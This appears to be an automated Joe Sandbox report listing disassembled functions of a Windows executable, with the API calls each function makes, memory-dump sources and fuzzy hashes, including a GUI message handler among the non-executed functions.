Part of subcall function 00414010: _memmove.LIBCMT ref: 0041405A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: ab96eb7e14a6c7fc6b5f838a1ac3fd511b70b8a521a7a7beb7fda6ac11062e1c
Instruction ID: c722268f12d3a3c4f47e5d64e6fbeeaea90ba10d8efe7bd6b0ea6c0acb62f622
Opcode Fuzzy Hash: ab96eb7e14a6c7fc6b5f838a1ac3fd511b70b8a521a7a7beb7fda6ac11062e1c
Instruction Fuzzy Hash: 2611E332600305BACB10BF66DC06BDE7AA59F90749F10482FF542E71C1DB789A859B68

Function 004710E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?), ref: 00471100

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c4c7d8e43e9dcf08f8ca720b6b897e8c5ce8c493a874c52bac0f7f0ce9948ae5
Instruction ID: 6a5847cf3b009f8175c63b6210d14df91f3fa0db5d5a2168324a651e9bb1d0fc
Opcode Fuzzy Hash: c4c7d8e43e9dcf08f8ca720b6b897e8c5ce8c493a874c52bac0f7f0ce9948ae5
Instruction Fuzzy Hash: 9E118C36301215AFDB10DF19C880ADA77A9FF49720B45816BFD4A8F361CB74AD818B99

Function 00414CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00414E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00414CF7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 442880e58d2419409cf3e75e1a3e48191ba2f9538c44ee4c6a190c7443193268
Instruction ID: 51e001d55ec11187450df2af7462b63ad69b433cda67ade29fe66292ceeba411
Opcode Fuzzy Hash: 442880e58d2419409cf3e75e1a3e48191ba2f9538c44ee4c6a190c7443193268
Instruction Fuzzy Hash: 9111AC312017409FD720CF16C880FA7B7E8EF80354F10C42EE59A86A40D779F884CBA4

Function 00414D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004845F9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
Instruction ID: 0e98288442061504711f118565380443dce8df809a50a81ef34f654643c6f28e
Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
Instruction Fuzzy Hash: 7B018FB5201502AFC306EB29D891D79F7A9FF89314754825EE469C7702CB35EC22CBE5

Function 0041CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0041CB2F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
Instruction ID: 6cd397fdffeab54ff91d2556ffb398a996b4b8b5efa8c675bcb7d2c47096889f
Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
Instruction Fuzzy Hash: 1D0149722447016ED3149B39EC07A67BBA8DF08760F90853FF95ACB2D0EB79F4408A58

Function 0042F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042F307

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
Instruction ID: 3010ff710a9fb6c9231fc5ffdef45b9e2296fcec593382a90aff977239dfe4b7
Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
Instruction Fuzzy Hash: DD012B31204211EBCB20AF2DF80199BBBB89F81324FD0453FFC5843251D739985987B9

Function 004695AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 004695C9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 8b6006ed3caa261dab663beb252b43b188cab5637508420b840f702c5355271a
Instruction ID: 85e119be89486c3d6994477b2b2d19e3ea6f12adbaef170aba0ee13f2c682d8c
Opcode Fuzzy Hash: 8b6006ed3caa261dab663beb252b43b188cab5637508420b840f702c5355271a
Instruction Fuzzy Hash: BFE0E5336042146BC320EA75DC05AABB799BF85720F04876ABDA4872C1DA30D814C3C5

Function 00413E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,004134E2,?,00000001), ref: 00413E6D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1765057db1fa921fe57148c036bb78f6033aa4fb5ced64dc472fc2440c9d4bf7
Instruction ID: c559f4c48568fc6774f39cb40112080f9b78a774687d161e7cea0d884cd87658
Opcode Fuzzy Hash: 1765057db1fa921fe57148c036bb78f6033aa4fb5ced64dc472fc2440c9d4bf7
Instruction Fuzzy Hash: 72F039B5501741CFCB349F65D490993BBE0AF1471A3248A7FE1D682621C739A988DF08

Function 004579F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00457A11

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: cf9da56352712a4bb9f5727fcdb6ca1817e0cf04ee511d4405d43825b3f74538
Instruction ID: 6ad6d1cf5d06936c6280a4ad8f709292dbbe84acc0fe8ceeb9765cd571a012fe
Opcode Fuzzy Hash: cf9da56352712a4bb9f5727fcdb6ca1817e0cf04ee511d4405d43825b3f74538
Instruction Fuzzy Hash: 75D05EA65002282FDB50E6249C09EFB36ADC744108F0002B1786DD2042E924AE8586E4

Function 0041193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00411952

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 0954aeba0df1cdcf62858ed0beb6de54c0ee33d7ae9a215ddc6502e7a13dfd2b
Instruction ID: e175dfbd5dd4ca12c8514fee83c315b3e84e2369d21b2f42befda41a51778693
Opcode Fuzzy Hash: 0954aeba0df1cdcf62858ed0beb6de54c0ee33d7ae9a215ddc6502e7a13dfd2b
Instruction Fuzzy Hash: A5D012F16942087EFB008761CD07DBB775CD731F81F0046717E06D64D1D6649E098574

Function 0044E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00411952

SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044E3AA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout
String ID:
API String ID: 1777923405-0
Opcode ID: 6ce617fb20bc99b8cca824a575117e4fa78519328a8b848951566ffb2495f3a8
Instruction ID: 09c2d5926e1993f8dfdddbc809b124ebcdd16e3a8a74ed71a33f3138421445c3
Opcode Fuzzy Hash: 6ce617fb20bc99b8cca824a575117e4fa78519328a8b848951566ffb2495f3a8
Instruction Fuzzy Hash: 1BD01231254110AAFA716F25FD06FC177A29B40750F11046BB580671F5C6D25C819548

Function 00466FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?), ref: 00466FE1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 8488eb4ca376920e30c815047c51e6a8c02191df27f753c35efa09db17e1bbcd
Instruction ID: fca88f59b7d08845a1f4dd94ef3f701ae22193b6a5c25bbfdd4b15cead22bb27
Opcode Fuzzy Hash: 8488eb4ca376920e30c815047c51e6a8c02191df27f753c35efa09db17e1bbcd
Instruction Fuzzy Hash: 4FD09E362105149F8701EF99DD44C8577E9FF5D7103018066F50ADB631DA21FC509B94

Function 00414FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004849DA,?,?,00000000), ref: 00414FC4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: bfdf9f03b77d55e5468f9b4099d95878f7c9662b20510db1f6c6bead66172ae0
Instruction ID: 561afa9d2b92624d360ec21c5e384821299b921715f0201e3d7cead69b39ea30
Opcode Fuzzy Hash: bfdf9f03b77d55e5468f9b4099d95878f7c9662b20510db1f6c6bead66172ae0
Instruction Fuzzy Hash: 3AD0C974640208BFEB00CB90DC47F9A7BBCEB04718F2001A5F600A62D0D2F2BE408B55

Function 00484DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00484DE7

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fc332f18664089c30c208b92675b3c76e127daaf734281b92b45bf91f714b4b2
Instruction ID: a9b78885a1070b272385dd74e12c8fd4efd4c46a726e4d156e4646e3594c92a3
Opcode Fuzzy Hash: fc332f18664089c30c208b92675b3c76e127daaf734281b92b45bf91f714b4b2
Instruction Fuzzy Hash: E8D0C7715001109BD7306F65F404746B7D4AF54344F54446FE9C586150D77A98C29B16

Function 00434129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00434134

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 9464a3cb69b1fe4514387642f5111b86479fdc4f1b2837d3ce200d79be243f0c
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: EFB0927244030C77CE112A82EC02A893B199B94764F008021FB0C18161A677AAA09A89

Function 004150EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00485950), ref: 0041510C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 58b2f0b50470016bf2cfab114e04d44c9875d3444e1bb85f964ca3edc200bac8
Instruction ID: c2a3a1941820f52251b8229d2db6f48540d15f8ab2135b354056d79ee1d989f8
Opcode Fuzzy Hash: 58b2f0b50470016bf2cfab114e04d44c9875d3444e1bb85f964ca3edc200bac8
Instruction Fuzzy Hash: F0E0B675800B12DBC2354F1AE804493FBF5FFE53613218A2FD0E582660D7B45486DB94

Non-executed Functions

Function 0047F5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0047F64E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047F6AD
GetWindowLongW.USER32(?,000000F0), ref: 0047F6EA
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047F711
SendMessageW.USER32 ref: 0047F737
_wcsncpy.LIBCMT ref: 0047F7A3
GetKeyState.USER32(00000011), ref: 0047F7C4
GetKeyState.USER32(00000009), ref: 0047F7D1
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047F7E7
GetKeyState.USER32(00000010), ref: 0047F7F1
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047F820
SendMessageW.USER32 ref: 0047F843
SendMessageW.USER32(?,00001030,?,0047DE69), ref: 0047F940
SetCapture.USER32(?), ref: 0047F970
ClientToScreen.USER32(?,?), ref: 0047F9D4
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0047F9FA
ReleaseCapture.USER32 ref: 0047FA05
GetCursorPos.USER32(?), ref: 0047FA3A
ScreenToClient.USER32(?,?), ref: 0047FA47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0047FAA9
SendMessageW.USER32 ref: 0047FAD3
SendMessageW.USER32(?,00001111,00000000,?), ref: 0047FB12
SendMessageW.USER32 ref: 0047FB3D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047FB55
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047FB60
GetCursorPos.USER32(?), ref: 0047FB81
ScreenToClient.USER32(?,?), ref: 0047FB8E
GetParent.USER32(?), ref: 0047FBAA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0047FC10
SendMessageW.USER32 ref: 0047FC40
ClientToScreen.USER32(?,?), ref: 0047FC96
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0047FCC2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0047FCEA
SendMessageW.USER32 ref: 0047FD0D
ClientToScreen.USER32(?,?), ref: 0047FD57
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0047FD87
GetWindowLongW.USER32(?,000000F0), ref: 0047FE1C

Strings

@GUI_DRAGID, xrefs: 0047F99D
F, xrefs: 0047FD13

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3461372671-4164748364
Opcode ID: 0eae25b8a2c3c686fc095b0531bdd42b6b3248c3d7c341ec531a67d4213f4546
Instruction ID: 21831394d9b94fee15887fa649008865cca90a91a950fec765ae980df00ad086
